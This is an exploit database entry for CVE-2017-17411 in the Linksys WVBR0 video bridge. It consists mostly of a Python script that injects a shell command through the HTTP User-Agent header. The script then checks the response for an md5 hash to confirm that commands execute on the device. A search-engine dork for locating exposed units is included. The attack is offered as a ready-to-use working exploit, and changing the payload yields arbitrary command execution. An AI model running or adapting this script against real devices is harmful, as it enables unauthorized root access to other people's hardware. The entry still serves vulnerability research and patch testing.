Linksys WVBR0 - 'User-Agent' Remote Command Injection

EDB-ID: 43363
Author: nixawk
Published: 2017-12-14
CVE: CVE-2017-17411
Type: Webapps
Platform: Hardware
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 # -*- coding: utf-8 -*- 

# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection

"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>

$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""

import requests


def check(url):
payload = '"; echo "admin'
md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum

resp = send_http_request(url, payload)

if not resp:
return False

lines = resp.text.splitlines()
sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)

if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
return False

if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
return False

print("[+] Target is exploitable by CVE-2017-17411 ")
return True


def send_http_request(url, payload):
headers = {
'User-Agent': payload
}

response = None
try:
response = requests.get(url, headers=headers)
except Exception as err:
log.exception(err)

return response


if __name__ == '__main__':
import sys

if len(sys.argv) != 2:
print("[*] Usage: python %s <URL>" % sys.argv[0])
sys.exit(0)

check(sys.argv[1])


# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"

## References

# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html

Related Posts

Comments